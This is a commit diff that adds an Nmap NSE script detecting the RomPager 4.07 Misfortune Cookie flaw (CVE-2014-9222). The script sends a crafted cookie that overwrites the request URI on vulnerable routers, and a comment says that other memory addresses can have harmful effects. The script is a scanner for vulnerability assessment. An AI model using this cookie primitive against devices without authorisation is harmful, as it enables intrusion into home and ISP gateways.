summaryrefslogtreecommitdiffstats
path: root/scripts/http-vuln-misfortune-cookie.nse
diff options
context:
space:
mode:
Diffstat (limited to '')
-rw-r--r--scripts/http-vuln-misfortune-cookie.nse77
1 files changed, 77 insertions, 0 deletions
diff --git a/scripts/http-vuln-misfortune-cookie.nse b/scripts/http-vuln-misfortune-cookie.nse
new file mode 100644
index 0000000..4ee0bd7
--- /dev/null
+++ b/scripts/http-vuln-misfortune-cookie.nse
@@ -0,0 +1,77 @@
+description = [[Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.]]
+
+author = "Andrew Orr"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln", "intrusive"}
+
+---
+-- @see http-vuln-cve2013-6786.nse
+--
+-- @usage
+-- nmap <target> -p 7547 --script=http-vuln-misfortune-cookie
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 7547/tcp open unknown syn-ack
+-- | http-vuln-misfortune-cookie:
+-- | VULNERABLE:
+-- | RomPager 4.07 Misfortune Cookie
+-- | State: VULNERABLE
+-- | IDs: BID:71744 CVE:CVE-2014-9222
+-- | Description:
+-- | The cookie handling routines in RomPager 4.07 are vulnerable to remote code
+-- | execution. This script has verified the vulnerability by exploiting the web
+-- | server in a safe manner.
+-- | References:
+-- | http://www.kb.cert.org/vuls/id/561444
+-- | http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
+-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
+-- | http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html
+-- |_ http://www.securityfocus.com/bid/71744
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+
+portrule = shortport.port_or_service(7547, "http")
+
+-- This memory address overwrites the request URI.
+-- Other addresses may have other effects, some harmful.
+local MAGIC_COOKIE = "C107373883"
+
+local function vuln_to_misfortune_cookie(host, port)
+ local request_path = "/nmap_test"
+ local options = { cookies = MAGIC_COOKIE .. "=" .. request_path }
+ local flag = request_path .. "' was not found on the RomPager server."
+ local req = http.get(host, port, "/", options)
+ if not(http.response_contains(req, flag)) then
+ return false
+ end
+ return true
+end
+
+action = function(host, port)
+ local vuln = {
+ title = "RomPager 4.07 Misfortune Cookie",
+ state = vulns.STATE.NOT_VULN,
+ IDS = { CVE = 'CVE-2014-9222', BID = '71744' },
+ description = [[
+The cookie handling routines in RomPager 4.07 are vulnerable to remote code
+execution. This script has verified the vulnerability by exploiting the web
+server in a safe manner.]],
+ references = {
+ "http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html",
+ "http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf",
+ "http://www.kb.cert.org/vuls/id/561444"
+ }
+ }
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ if vuln_to_misfortune_cookie(host, port) then
+ vuln.state = vulns.STATE.VULN
+ else
+ vuln.state = vulns.STATE.NOT_VULN
+ end
+
+ return report:make_output(vuln)
+end